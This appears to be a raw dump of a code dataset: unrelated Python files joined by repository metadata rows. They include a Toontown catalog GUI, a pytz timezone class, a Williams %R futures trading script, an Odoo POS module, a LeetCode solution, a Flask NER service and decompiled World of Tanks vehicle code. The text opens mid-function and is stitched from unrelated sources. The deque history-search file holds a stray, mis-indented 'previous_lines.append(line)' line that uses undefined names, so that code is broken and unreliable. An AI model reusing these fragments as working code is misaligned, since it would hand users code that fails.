                elif self['item'].reachedPurchaseLimit(avatar):
                    self.giftButton.show()
                    self.giftButton['state'] = DGG.DISABLED
                    auxText = TTLocalizer.CatalogPurchasedGiftText
                    self.auxText['text'] = auxText
                    return None
                elif len(avatar.mailboxContents) + len(avatar.onGiftOrder) >= ToontownGlobals.MaxMailboxContents:
                    self.giftButton.show()
                    self.giftButton['state'] = DGG.DISABLED
                    auxText = TTLocalizer.CatalogMailboxFull
                    self.auxText['text'] = auxText
                    return None
                elif self['item'].getPrice(self['type']) <= base.localAvatar.getMoney() + base.localAvatar.getBankMoney():
                    self.giftButton['state'] = DGG.NORMAL
                    self.giftButton.show()
    def handleSoundOnButton(self):
        """Start the audio preview: swap to the 'off' button and loop the
        item's interval at full volume."""
        item = self.items[self.itemIndex]
        self.soundOnButton.hide()
        self.soundOffButton.show()
        if hasattr(item, 'changeIval'):
            if self.ival:
                self.ival.finish()
                self.ival = None
            self.ival = item.changeIval(volume = 1)
            self.ival.loop()
    def handleSoundOffButton(self):
        """Mute the audio preview: swap to the 'on' button and loop the
        item's interval at zero volume."""
        item = self.items[self.itemIndex]
        self.soundOffButton.hide()
        self.soundOnButton.show()
        if hasattr(item, 'changeIval'):
            if self.ival:
                self.ival.finish()
                self.ival = None
            self.ival = item.changeIval(volume = 0)
            self.ival.loop()
| [
"[email protected]"
] | |
4103376dbbca20b7caa6c000a96c5304895c31f9 | e017eca53dbe0d35977546df1bb36a59915f6899 | /debugging/assert_variable.py | 8aec26cfafa0f80b02465a455cc3c785aa89bd35 | [] | no_license | clivejan/python_basic | 7d14b7335f253658f8814acbdb753a735481e377 | 773de644a87792b872e38017dcac34c1691ccc87 | refs/heads/master | 2020-12-04T17:44:24.737370 | 2020-01-09T14:43:36 | 2020-01-18T03:11:20 | 231,856,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 334 | py | #!/usr/bin/env python3 -O
# Assertions document programmer errors (invariant violations); they should
# not be handled with try/except, and note that they are stripped entirely
# when Python runs with the -O flag.
# This assertion holds, so execution continues past it.
job_title = 'DevOps'
assert job_title == "DevOps", "Transform from SE to DevOps"
# This assertion fails: AssertionError is raised with the message below
# (unless the interpreter was started with -O), so print() is never reached.
job_title = 'Systems Engineer'
assert job_title == "DevOps", "Transform from SE to DevOps"
print(job_title)
| [
"[email protected]"
] | |
0116db3631d3d531836248a0bca1d5d46ba83d49 | 302442c32bacca6cde69184d3f2d7529361e4f3c | /cidtrsend-all/stage3-model/pytz/zoneinfo/Africa/Bujumbura.py | 76c4c7a6e44ba67e832b34d93a452c2827caf84f | [] | no_license | fucknoob/WebSemantic | 580b85563072b1c9cc1fc8755f4b09dda5a14b03 | f2b4584a994e00e76caccce167eb04ea61afa3e0 | refs/heads/master | 2021-01-19T09:41:59.135927 | 2015-02-07T02:11:23 | 2015-02-07T02:11:23 | 30,441,659 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | '''tzinfo timezone information for Africa/Bujumbura.'''
from pytz.tzinfo import StaticTzInfo
from pytz.tzinfo import memorized_timedelta as timedelta
class Bujumbura(StaticTzInfo):
    """Fixed-offset tzinfo for Africa/Bujumbura: CAT, UTC+02:00, no DST.

    See datetime.tzinfo for the interface details.
    """
    zone = 'Africa/Bujumbura'
    _tzname = 'CAT'
    _utcoffset = timedelta(seconds=7200)
# Following the pytz.zoneinfo convention, replace the class with a
# ready-to-use singleton instance under the same name.
Bujumbura = Bujumbura()
| [
"[email protected]"
] | |
ab96c2674dd84ae1432b1ef67ca398aa1e033854 | 71f3ecb8fc4666fcf9a98d39caaffc2bcf1e865c | /.history/第2章/2-2/lishi_20200527235931.py | 947e75d59de12d8489b2a6b14a7c1c09b49fe148 | [
"MIT"
] | permissive | dltech-xyz/Alg_Py_Xiangjie | 03a9cac9bdb062ce7a0d5b28803b49b8da69dcf3 | 877c0f8c75bf44ef524f858a582922e9ca39bbde | refs/heads/master | 2022-10-15T02:30:21.696610 | 2020-06-10T02:35:36 | 2020-06-10T02:35:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 955 | py | #!/usr/bin/env python
# coding=utf-8
'''
@version:
@Author: steven
@Date: 2020-05-27 22:20:22
@LastEditors: steven
@LastEditTime: 2020-05-27 23:59:31
@Description:将列表的最后几项作为历史记录的过程。
'''
from _collections import deque
def search(lines, pattern, history=5):
    """Scan *lines* for *pattern*, yielding each hit with its context.

    Yields ``(matching_line, window)`` pairs, where *window* is the live
    bounded deque holding up to *history* lines seen before the match.
    Because the same deque object is yielded each time, callers should
    inspect (or copy) it before advancing the generator.
    """
    window = deque(maxlen=history)
    for current in lines:
        if pattern in current:
            yield current, window
        window.append(current)
previous_lines.append(line)
# Example use on a file
if __name__ == '__main__':
    # Bug fix: the original path '\123.txt' contained the octal escape \123
    # (the character 'S'), so the script actually tried to open 'S.txt'.
    # Use the intended literal file name instead.
    with open('123.txt') as f:
        for line, prevlines in search(f, 'python', 5):
            # Print the stored context lines, then the matching line itself.
            for pline in prevlines:
                print(pline)
            print(line)
            print('-' * 20)
    # Small demo of deque's bounded behaviour: once maxlen is reached,
    # appending pushes the oldest element out of the left end.
    q = deque(maxlen=3)
    q.append(1)
    q.append(2)
    q.append(3)
    print(q)
    q.append(4)
    print(q)
| [
"[email protected]"
] | |
82c5ce7b4ebbb0b5752945713ead109a06be2960 | 16ba38ef11b82e93d3b581bbff2c21e099e014c4 | /haohaninfo/Python_Future_Sample/實單交易/90.py | dbf39a68d38224f520449600d95099dfb3431206 | [] | no_license | penguinwang96825/Auto-Trading | cb7a5addfec71f611bdd82534b90e5219d0602dd | a031a921dbc036681c5054f2c035f94499b95d2e | refs/heads/master | 2022-12-24T21:25:34.835436 | 2020-09-22T09:59:56 | 2020-09-22T09:59:56 | 292,052,986 | 2 | 5 | null | null | null | null | UTF-8 | Python | false | false | 1,692 | py | # -*- coding: UTF-8 -*-
# 載入相關套件
import sys,indicator,datetime,haohaninfo
# 券商
Broker = 'Masterlink_Future'
# 定義資料類別
Table = 'match'
# 定義商品名稱
Prod = sys.argv[1]
# 取得當天日期
Date = datetime.datetime.now().strftime("%Y%m%d")
# K棒物件
KBar = indicator.KBar(Date,'time',1)
# 定義威廉指標的週期、超買區、超賣區
WILLRPeriod = 14
OverBuy = -20
OverSell = -80
# 預設趨勢為1,假設只有多單進場
Trend=1
# 進場判斷
Index=0
GO = haohaninfo.GOrder.GOQuote()
for i in GO.Describe(Broker, Table, Prod):
time = datetime.datetime.strptime(i[0],'%Y/%m/%d %H:%M:%S.%f')
price=float(i[2])
qty=int(i[3])
tag=KBar.TimeAdd(time,price,qty)
# 更新K棒才判斷,若要逐筆判斷則 註解下面兩行
if tag != 1:
continue
Real = KBar.GetWILLR(WILLRPeriod)
# 當威廉指標已經計算完成,才會去進行判斷
if len(Real) > WILLRPeriod+1:
ThisReal = Real[-1-tag]
LastReal = Real[-2-tag]
# 進入超賣區 並且回檔
if Trend==1 and ThisReal > OverSell and LastReal <= OverSell:
Index=1
OrderTime=time
OrderPrice=price
print(OrderTime,"Order Buy Price:",OrderPrice,"Success!")
GO.EndDescribe()
# 進入超買區 並且回檔
elif Trend==-1 and ThisReal < OverBuy and LastReal >= OverBuy:
Index=-1
OrderTime=time
OrderPrice=price
print(OrderTime,"Order Sell Price:",OrderPrice,"Success!")
GO.EndDescribe()
| [
"[email protected]"
] | |
5106152e77d060a927253686296d12540bed8155 | 2a94e60460f91c4a4b919953ef1a15de4d89166a | /argil_cb_pos_ticket/pos.py | 79525802be904af3b677e6207922930e7981aaf3 | [] | no_license | germanponce/addons_cb | de8ddee13df36cf2278edbbc495564bbff8ea29e | 858453d4f4c3e8b43d34a759b20306926f0bf63e | refs/heads/master | 2021-01-22T23:20:16.826694 | 2015-10-29T22:05:03 | 2015-10-29T22:05:03 | 41,502,521 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,265 | py | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields, api, _
from openerp.tools import float_compare
import openerp.addons.decimal_precision as dp
from datetime import time, datetime
from openerp import SUPERUSER_ID
from openerp import tools
from openerp.osv import osv, fields, expression
from openerp.tools.translate import _
from openerp.exceptions import except_orm, Warning, RedirectWarning
import base64
import amount_to_text_mx as amount_to
# AMOUNT TO TEXT
class pos_order(osv.osv):
_name ='pos.order'
_inherit = 'pos.order'
def _amount_text(self, cr, uid, ids, field_name, args, context=None):
if not context:
context = {}
res = {}
amount_to_text = ''
for record in self.browse(cr, uid, ids, context=context):
if record.amount_total > 0:
amount_to_text = amount_to.get_amount_to_text(
self, record.amount_total, 'es_cheque', record.pricelist_id.currency_id.name
)
res[record.id] = amount_to_text
return res
_columns = {
'amount_to_text': fields.function(_amount_text, method=True, string='Monto en Letra', type='char', size=256, store=True),
}
| [
"[email protected]"
] | |
0a97d29e2bec4a1a9d370b41f0a000614f2f24db | c3e2f56672e01590dc7dc7e184f30c2884ce5d3a | /Programs/MyPythonXII/Unit1/PyChap06/filera.py | 9500b097eee3e35d0a288c02f76d1e850d45b55f | [] | no_license | mridulrb/Basic-Python-Examples-for-Beginners | ef47e830f3cc21cee203de2a7720c7b34690e3e1 | 86b0c488de4b23b34f7424f25097afe1874222bd | refs/heads/main | 2023-01-04T09:38:35.444130 | 2020-10-18T15:59:29 | 2020-10-18T15:59:29 | 305,129,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | # File name: ...\\MyPythonXII\Unit1\PyChap06\filera.py
import os
txtfile = "Friends.txt" # Text file is assigned
if os.path.isfile(txtfile):
print ("Friends names are...")
print ("-------------------")
for F in open(txtfile).read(): # Both open and read the contents
print (F, end="")
else:
print ("File does not exist.")
| [
"[email protected]"
] | |
b8e7b0de85b7573829e61fafb9cd287c1173b9af | fbd5c602a612ea9e09cdd35e3a2120eac5a43ccf | /Finished/old_py/75.颜色分类.py | 7bd771f54cb7ff8dcc151c48d2e2b94a7f6bf8e8 | [] | no_license | czccc/LeetCode | 0822dffee3b6fd8a6c6e34be2525bbd65ccfa7c0 | ddeb1c473935480c97f3d7986a602ee2cb3acaa8 | refs/heads/master | 2023-09-01T18:18:45.973563 | 2023-08-27T02:44:00 | 2023-08-27T02:44:00 | 206,226,364 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,119 | py | #
# @lc app=leetcode.cn id=75 lang=python
#
# [75] 颜色分类
#
# @lc code=start
class Solution(object):
def sortColors(self, nums):
"""
:type nums: List[int]
:rtype: None Do not return anything, modify nums in-place instead.
"""
left, right = -1, len(nums)
p = 0
while p < right:
if nums[p] == 2:
right -= 1
nums[p] = nums[right]
nums[right] = 2
elif nums[p] == 1:
p += 1
else:
left += 1
nums[p] = 1
nums[left] = 0
p += 1
return
# @lc code=end
# TEST ONLY
import unittest
import sys
sys.path.append("..")
from Base.PyVar import *
class SolutionTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._func = Solution().sortColors
def test_1(self):
args = [[2, 0, 2, 1, 1, 0]]
ans = [0, 0, 1, 1, 2, 2]
cur_ans = self._func(*args)
self.assertEqual(args[0], ans)
if __name__ == "__main__":
unittest.main(verbosity=2)
| [
"[email protected]"
] | |
5c9dac8602f051955f5bba3b5b992bee8b05f77a | 88900156c1fc6d496e87a0c403811e30a7398cfc | /check4fsm/Communication.py | 70dd87ad40c4646164be3443114f9caeac43fce8 | [] | no_license | Totoro2205/check4fsm | 4be7b73b9331ed2d46ce119b762d67a64a4420cc | 4245b7f0babca6f5d15d1f85ee85fddc69cf0196 | refs/heads/main | 2023-08-10T07:32:22.121413 | 2021-09-20T09:28:57 | 2021-09-20T09:28:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,207 | py | #!/usr/bin/env python
from check4fsm.ProccesText import ProcessText
from check4fsm.TonalizeText import TonalText
from check4fsm.ProcessAppeal import ProcessAppeal
from check4fsm.extractAllData import ExtractData
from check4fsm import *
from natasha import Segmenter, Doc
from loguru import logger
from flask_cors import CORS
import flask
import time
import nltk
import os
logger.add(f"{os.getcwd()}/.logger.log", format="{time} {level} {message}", rotation="50 MB")
ed = ExtractData(os.getcwd() + "/../data/cities.json", os.getcwd() + "/../data/NER.json")
app = flask.Flask(__name__)
class CommunicationFlask:
CORS(app)
def __init__(self, cities: str = os.getcwd() + "/../data/cities.json",
ner: str = os.getcwd() + "/../data/NER.json"):
global ed
ed = ExtractData(cities, ner)
@staticmethod
@logger.catch
@app.route('/', methods=["GET"])
def main_route():
data = flask.request.json
global ed
if data is None:
logger.error(f" failed data is None")
return {}
output_data = dict()
try:
output_data = ed(data["text"])
except Exception as ex:
logger.error(f" failed on the server {ex}")
return {}
return output_data
@staticmethod
@logger.catch
@app.route('/', methods=["POST"])
def hooks():
data = flask.request.json
global ed
if data is None:
logger.error(f" failed data is None")
return {}
output_data = dict()
try:
output_data = ed(data["text"])
except Exception as ex:
logger.error(f" failed on the server {ex}")
return {}
return output_data
@logger.catch
def run_flask(self):
global app
app.run(host="0.0.0.0", port=9000)
def run(cities: str = os.getcwd() + "/data/cities.json", ner: str = os.getcwd() + "/data/NER.json"):
logger.info("Loading all systems")
p = CommunicationFlask(cities, ner)
logger.info("Loaded all systems")
p.run_flask()
if __name__ == '__main__':
run( os.getcwd() + "/data/cities.json", os.getcwd() + "/data/NER.json") | [
"[email protected]"
] | |
09a53f5f138f99f620cd6ce77126883840240b39 | 9c85d132b2ed8c51f021f42ed9f20652827bca45 | /source/res/scripts/client/gui/shared/gui_items/vehicle.py | 3abc3d8ff7ab639c495503159428a7e726120fa4 | [] | no_license | Mododejl/WorldOfTanks-Decompiled | 0f4063150c7148184644768b55a9104647f7e098 | cab1b318a58db1e428811c41efc3af694906ba8f | refs/heads/master | 2020-03-26T18:08:59.843847 | 2018-06-12T05:40:05 | 2018-06-12T05:40:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 52,084 | py | # Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/shared/gui_items/Vehicle.py
import math
import random
from itertools import izip
from operator import itemgetter
import BigWorld
import constants
from AccountCommands import LOCK_REASON, VEHICLE_SETTINGS_FLAG
from account_shared import LayoutIterator
from constants import WIN_XP_FACTOR_MODE
from gui import makeHtmlString
from gui.Scaleform.locale.ITEM_TYPES import ITEM_TYPES
from gui.Scaleform.locale.RES_ICONS import RES_ICONS
from gui.prb_control import prb_getters
from gui.prb_control.settings import PREBATTLE_SETTING_NAME
from gui.shared.economics import calcRentPackages, getActionPrc, calcVehicleRestorePrice
from gui.shared.formatters import text_styles
from gui.shared.gui_items import CLAN_LOCK, GUI_ITEM_TYPE, getItemIconName, GUI_ITEM_ECONOMY_CODE
from gui.shared.gui_items.vehicle_equipment import VehicleEquipment
from gui.shared.gui_items.gui_item import HasStrCD
from gui.shared.gui_items.fitting_item import FittingItem, RentalInfoProvider
from gui.shared.gui_items.Tankman import Tankman
from gui.shared.money import MONEY_UNDEFINED, Currency, Money
from gui.shared.gui_items.customization.outfit import Outfit
from gui.shared.gui_items.gui_item_economics import ItemPrice, ItemPrices, ITEM_PRICE_EMPTY
from gui.shared.utils import makeSearchableString
from helpers import i18n, time_utils, dependency
from items import vehicles, tankmen, customizations, getTypeInfoByName, getTypeOfCompactDescr
from items.components.c11n_constants import SeasonType, CustomizationType, StyleFlags
from shared_utils import findFirst, CONST_CONTAINER
from skeletons.gui.game_control import IIGRController
from skeletons.gui.lobby_context import ILobbyContext
from skeletons.gui.server_events import IEventsCache
class VEHICLE_CLASS_NAME(CONST_CONTAINER):
    """String identifiers for the five vehicle classes used throughout the GUI."""
    LIGHT_TANK = 'lightTank'
    MEDIUM_TANK = 'mediumTank'
    HEAVY_TANK = 'heavyTank'
    SPG = 'SPG'
    AT_SPG = 'AT-SPG'
# Canonical display order of vehicle classes (light -> medium -> heavy -> TD -> SPG).
VEHICLE_TYPES_ORDER = (VEHICLE_CLASS_NAME.LIGHT_TANK,
 VEHICLE_CLASS_NAME.MEDIUM_TANK,
 VEHICLE_CLASS_NAME.HEAVY_TANK,
 VEHICLE_CLASS_NAME.AT_SPG,
 VEHICLE_CLASS_NAME.SPG)
# Maps class name -> position in VEHICLE_TYPES_ORDER, used as a sort key.
VEHICLE_TYPES_ORDER_INDICES = dict(((n, i) for i, n in enumerate(VEHICLE_TYPES_ORDER)))
# Sort-order value for vehicle classes not present in the mapping above.
UNKNOWN_VEHICLE_CLASS_ORDER = 100
def compareByVehTypeName(vehTypeA, vehTypeB):
    """cmp-style comparator ordering vehicle class names per VEHICLE_TYPES_ORDER."""
    indices = VEHICLE_TYPES_ORDER_INDICES
    return indices[vehTypeA] - indices[vehTypeB]
def compareByVehTableTypeName(vehTypeA, vehTypeB):
    """cmp-style comparator ordering class names per VEHICLE_TABLE_TYPES_ORDER."""
    indices = VEHICLE_TABLE_TYPES_ORDER_INDICES
    return indices[vehTypeA] - indices[vehTypeB]
# Class order used by table views (heavy first).
VEHICLE_TABLE_TYPES_ORDER = (VEHICLE_CLASS_NAME.HEAVY_TANK,
 VEHICLE_CLASS_NAME.MEDIUM_TANK,
 VEHICLE_CLASS_NAME.LIGHT_TANK,
 VEHICLE_CLASS_NAME.AT_SPG,
 VEHICLE_CLASS_NAME.SPG)
# Forward and reversed index maps for the table order.
VEHICLE_TABLE_TYPES_ORDER_INDICES = dict(((n, i) for i, n in enumerate(VEHICLE_TABLE_TYPES_ORDER)))
VEHICLE_TABLE_TYPES_ORDER_INDICES_REVERSED = dict(((n, i) for i, n in enumerate(reversed(VEHICLE_TABLE_TYPES_ORDER))))
# Class order used by in-battle displays.
VEHICLE_BATTLE_TYPES_ORDER = (VEHICLE_CLASS_NAME.HEAVY_TANK,
 VEHICLE_CLASS_NAME.MEDIUM_TANK,
 VEHICLE_CLASS_NAME.AT_SPG,
 VEHICLE_CLASS_NAME.LIGHT_TANK,
 VEHICLE_CLASS_NAME.SPG)
VEHICLE_BATTLE_TYPES_ORDER_INDICES = dict(((n, i) for i, n in enumerate(VEHICLE_BATTLE_TYPES_ORDER)))
class VEHICLE_TAGS(CONST_CONTAINER):
    """Tag strings attached to vehicle types that modify GUI behavior."""
    PREMIUM = 'premium'
    PREMIUM_IGR = 'premiumIGR'
    CANNOT_BE_SOLD = 'cannot_be_sold'
    SECRET = 'secret'
    SPECIAL = 'special'
    OBSERVER = 'observer'
    DISABLED_IN_ROAMING = 'disabledInRoaming'
    EVENT = 'event_battles'
    EXCLUDED_FROM_SANDBOX = 'excluded_from_sandbox'
    TELECOM = 'telecom'
    UNRECOVERABLE = 'unrecoverable'
    CREW_LOCKED = 'lockCrew'
    OUTFIT_LOCKED = 'lockOutfit'
class Vehicle(FittingItem, HasStrCD):
    """GUI item wrapping one vehicle: descriptor, modules, crew, prices and hangar state."""
    __slots__ = ('__descriptor', '__customState', '_inventoryID', '_xp', '_dailyXPFactor', '_isElite', '_isFullyElite', '_clanLock', '_isUnique', '_rentPackages', '_hasRentPackages', '_isDisabledForBuy', '_isSelected', '_restorePrice', '_canTradeIn', '_canTradeOff', '_tradeOffPriceFactor', '_tradeOffPrice', '_searchableUserName', '_personalDiscountPrice', '_rotationGroupNum', '_rotationBattlesLeft', '_isRotationGroupLocked', '_isInfiniteRotationGroup', '_settings', '_lock', '_repairCost', '_health', '_gun', '_turret', '_engine', '_chassis', '_radio', '_fuelTank', '_optDevices', '_shells', '_equipment', '_equipmentLayout', '_bonuses', '_crewIndices', '_crew', '_lastCrew', '_hasModulesToSelect', '_customOutfits', '_styledOutfits')
    # A vehicle counts as "ammo full enough" at >= 20% of max ammo capacity.
    NOT_FULL_AMMO_MULTIPLIER = 0.2
    # Factor applied to the longest rent package to cap total rent duration.
    MAX_RENT_MULTIPLIER = 2

    class VEHICLE_STATE(object):
        # String identifiers for every hangar/battle state a vehicle can be in.
        DAMAGED = 'damaged'
        EXPLODED = 'exploded'
        DESTROYED = 'destroyed'
        UNDAMAGED = 'undamaged'
        BATTLE = 'battle'
        IN_PREBATTLE = 'inPrebattle'
        LOCKED = 'locked'
        CREW_NOT_FULL = 'crewNotFull'
        AMMO_NOT_FULL = 'ammoNotFull'
        AMMO_NOT_FULL_EVENTS = 'ammoNotFullEvents'
        SERVER_RESTRICTION = 'serverRestriction'
        RENTAL_IS_OVER = 'rentalIsOver'
        IGR_RENTAL_IS_OVER = 'igrRentalIsOver'
        IN_PREMIUM_IGR_ONLY = 'inPremiumIgrOnly'
        GROUP_IS_NOT_READY = 'group_is_not_ready'
        NOT_PRESENT = 'notpresent'
        UNAVAILABLE = 'unavailable'
        UNSUITABLE_TO_QUEUE = 'unsuitableToQueue'
        UNSUITABLE_TO_UNIT = 'unsuitableToUnit'
        # States that may be overridden via setCustomState().
        CUSTOM = (UNSUITABLE_TO_QUEUE, UNSUITABLE_TO_UNIT)
        DEAL_IS_OVER = 'dealIsOver'
        ROTATION_GROUP_UNLOCKED = 'rotationGroupUnlocked'
        ROTATION_GROUP_LOCKED = 'rotationGroupLocked'

    # States in which selling the vehicle is still allowed.
    CAN_SELL_STATES = [VEHICLE_STATE.UNDAMAGED,
     VEHICLE_STATE.CREW_NOT_FULL,
     VEHICLE_STATE.AMMO_NOT_FULL,
     VEHICLE_STATE.GROUP_IS_NOT_READY,
     VEHICLE_STATE.UNSUITABLE_TO_QUEUE,
     VEHICLE_STATE.UNSUITABLE_TO_UNIT,
     VEHICLE_STATE.ROTATION_GROUP_UNLOCKED,
     VEHICLE_STATE.ROTATION_GROUP_LOCKED]
    GROUP_STATES = [VEHICLE_STATE.GROUP_IS_NOT_READY]

    class VEHICLE_STATE_LEVEL(object):
        # Severity buckets used to color/format the state in the GUI.
        CRITICAL = 'critical'
        INFO = 'info'
        WARNING = 'warning'
        RENTED = 'rented'

    # Injected service dependencies (resolved by the dependency framework).
    igrCtrl = dependency.descriptor(IIGRController)
    eventsCache = dependency.descriptor(IEventsCache)
    lobbyContext = dependency.descriptor(ILobbyContext)
def __init__(self, strCompactDescr=None, inventoryID=-1, typeCompDescr=None, proxy=None):
if strCompactDescr is not None:
vehDescr = vehicles.VehicleDescr(compactDescr=strCompactDescr)
else:
_, nID, innID = vehicles.parseIntCompactDescr(typeCompDescr)
vehDescr = vehicles.VehicleDescr(typeID=(nID, innID))
self.__descriptor = vehDescr
HasStrCD.__init__(self, strCompactDescr)
FittingItem.__init__(self, vehDescr.type.compactDescr, proxy)
self._inventoryID = inventoryID
self._xp = 0
self._dailyXPFactor = -1
self._isElite = False
self._isFullyElite = False
self._clanLock = 0
self._isUnique = self.isHidden
self._rentPackages = []
self._hasRentPackages = False
self._isDisabledForBuy = False
self._isSelected = False
self._restorePrice = None
self._canTradeIn = False
self._canTradeOff = False
self._tradeOffPriceFactor = 0
self._tradeOffPrice = MONEY_UNDEFINED
self._rotationGroupNum = 0
self._rotationBattlesLeft = 0
self._isRotationGroupLocked = False
self._isInfiniteRotationGroup = False
self._customOutfits = {}
self._styledOutfits = {}
if self.isPremiumIGR:
self._searchableUserName = makeSearchableString(self.shortUserName)
else:
self._searchableUserName = makeSearchableString(self.userName)
invData = dict()
tradeInData = None
if proxy is not None and proxy.inventory.isSynced() and proxy.stats.isSynced() and proxy.shop.isSynced() and proxy.vehicleRotation.isSynced() and proxy.recycleBin.isSynced():
invDataTmp = proxy.inventory.getItems(GUI_ITEM_TYPE.VEHICLE, inventoryID)
if invDataTmp is not None:
invData = invDataTmp
tradeInData = proxy.shop.tradeIn
self._xp = proxy.stats.vehiclesXPs.get(self.intCD, self._xp)
if proxy.shop.winXPFactorMode == WIN_XP_FACTOR_MODE.ALWAYS or self.intCD not in proxy.stats.multipliedVehicles and not self.isOnlyForEventBattles:
self._dailyXPFactor = proxy.shop.dailyXPFactor
self._isElite = not vehDescr.type.unlocksDescrs or self.intCD in proxy.stats.eliteVehicles
self._isFullyElite = self.isElite and not any((data[1] not in proxy.stats.unlocks for data in vehDescr.type.unlocksDescrs))
clanDamageLock = proxy.stats.vehicleTypeLocks.get(self.intCD, {}).get(CLAN_LOCK, 0)
clanNewbieLock = proxy.stats.globalVehicleLocks.get(CLAN_LOCK, 0)
self._clanLock = clanDamageLock or clanNewbieLock
self._isDisabledForBuy = self.intCD in proxy.shop.getNotToBuyVehicles()
self._hasRentPackages = bool(proxy.shop.getVehicleRentPrices().get(self.intCD, {}))
self._isSelected = bool(self.invID in proxy.stats.oldVehInvIDs)
self._customOutfits = self._parseCustomOutfits(self.intCD, proxy)
self._styledOutfits = self._parseStyledOutfits(self.intCD, proxy)
restoreConfig = proxy.shop.vehiclesRestoreConfig
self._restorePrice = calcVehicleRestorePrice(self.buyPrices.itemPrice.defPrice, proxy.shop)
self._restoreInfo = proxy.recycleBin.getVehicleRestoreInfo(self.intCD, restoreConfig.restoreDuration, restoreConfig.restoreCooldown)
self._personalDiscountPrice = proxy.shop.getPersonalVehicleDiscountPrice(self.intCD)
self._rotationGroupNum = proxy.vehicleRotation.getGroupNum(self.intCD)
self._rotationBattlesLeft = proxy.vehicleRotation.getBattlesCount(self.rotationGroupNum)
self._isRotationGroupLocked = proxy.vehicleRotation.isGroupLocked(self.rotationGroupNum)
self._isInfiniteRotationGroup = proxy.vehicleRotation.isInfinite(self.rotationGroupNum)
self._inventoryCount = 1 if invData.keys() else 0
data = invData.get('rent')
if data is not None:
self._rentInfo = RentalInfoProvider(isRented=True, *data)
self._settings = invData.get('settings', 0)
self._lock = invData.get('lock', (0, 0))
self._repairCost, self._health = invData.get('repair', (0, 0))
self._gun = self.itemsFactory.createVehicleGun(vehDescr.gun.compactDescr, proxy, vehDescr.gun)
self._turret = self.itemsFactory.createVehicleTurret(vehDescr.turret.compactDescr, proxy, vehDescr.turret)
self._engine = self.itemsFactory.createVehicleEngine(vehDescr.engine.compactDescr, proxy, vehDescr.engine)
self._chassis = self.itemsFactory.createVehicleChassis(vehDescr.chassis.compactDescr, proxy, vehDescr.chassis)
self._radio = self.itemsFactory.createVehicleRadio(vehDescr.radio.compactDescr, proxy, vehDescr.radio)
self._fuelTank = self.itemsFactory.createVehicleFuelTank(vehDescr.fuelTank.compactDescr, proxy, vehDescr.fuelTank)
sellPrice = self._calcSellPrice(proxy)
defaultSellPrice = self._calcDefaultSellPrice(proxy)
self._sellPrices = ItemPrices(itemPrice=ItemPrice(price=sellPrice, defPrice=defaultSellPrice), itemAltPrice=ITEM_PRICE_EMPTY)
if tradeInData is not None and tradeInData.isEnabled and self.isPremium and not self.isPremiumIGR:
self._tradeOffPriceFactor = tradeInData.sellPriceFactor
tradeInLevels = tradeInData.allowedVehicleLevels
self._canTradeIn = not self.isPurchased and not self.isHidden and self.isUnlocked and not self.isRestorePossible() and self.level in tradeInLevels
self._canTradeOff = self.isPurchased and not self.canNotBeSold and self.intCD not in tradeInData.forbiddenVehicles and self.level in tradeInLevels
if self.canTradeOff:
self._tradeOffPrice = Money(gold=int(math.ceil(self.tradeOffPriceFactor * self.buyPrices.itemPrice.price.gold)))
self._optDevices = self._parserOptDevs(vehDescr.optionalDevices, proxy)
gunAmmoLayout = []
for shell in self.gun.defaultAmmo:
gunAmmoLayout += (shell.intCD, shell.defaultCount)
self._shells = self._parseShells(invData.get('shells', list()), invData.get('shellsLayout', dict()).get(self.shellsLayoutIdx, gunAmmoLayout), proxy)
self._equipment = VehicleEquipment(proxy, invData.get('eqs'))
self._equipmentLayout = VehicleEquipment(proxy, invData.get('eqsLayout'))
defaultCrew = [None] * len(vehDescr.type.crewRoles)
crewList = invData.get('crew', defaultCrew)
self._bonuses = self._calcCrewBonuses(crewList, proxy)
self._crewIndices = dict([ (invID, idx) for idx, invID in enumerate(crewList) ])
self._crew = self._buildCrew(crewList, proxy)
self._lastCrew = invData.get('lastCrew')
self._rentPackages = calcRentPackages(self, proxy)
self._hasModulesToSelect = self.__hasModulesToSelect()
self.__customState = ''
return
@property
def buyPrices(self):
currency = self._buyPrices.itemPrice.price.getCurrency()
if self._personalDiscountPrice is not None and self._personalDiscountPrice.get(currency) <= self._buyPrices.itemPrice.price.get(currency):
currentPrice = self._personalDiscountPrice
else:
currentPrice = self._buyPrices.itemPrice.price
if self.isRented and not self.rentalIsOver:
buyPrice = currentPrice - self.rentCompensation
else:
buyPrice = currentPrice
return ItemPrices(itemPrice=ItemPrice(price=buyPrice, defPrice=self._buyPrices.itemPrice.defPrice), itemAltPrice=self._buyPrices.itemAltPrice)
    @property
    def searchableUserName(self):
        # Normalized display name used by hangar search/filtering.
        return self._searchableUserName
def getUnlockDescrByIntCD(self, intCD):
for unlockIdx, data in enumerate(self.descriptor.type.unlocksDescrs):
if intCD == data[1]:
return (unlockIdx, data[0], set(data[2:]))
return (-1, 0, set())
def _calcSellPrice(self, proxy):
if self.isRented:
return MONEY_UNDEFINED
price = self.sellPrices.itemPrice.price
defaultDevices, installedDevices, _ = self.descriptor.getDevices()
for defCompDescr, instCompDescr in izip(defaultDevices, installedDevices):
if defCompDescr == instCompDescr:
continue
modulePrice = FittingItem(defCompDescr, proxy).sellPrices.itemPrice.price
price = price - modulePrice
modulePrice = FittingItem(instCompDescr, proxy).sellPrices.itemPrice.price
price = price + modulePrice
return price
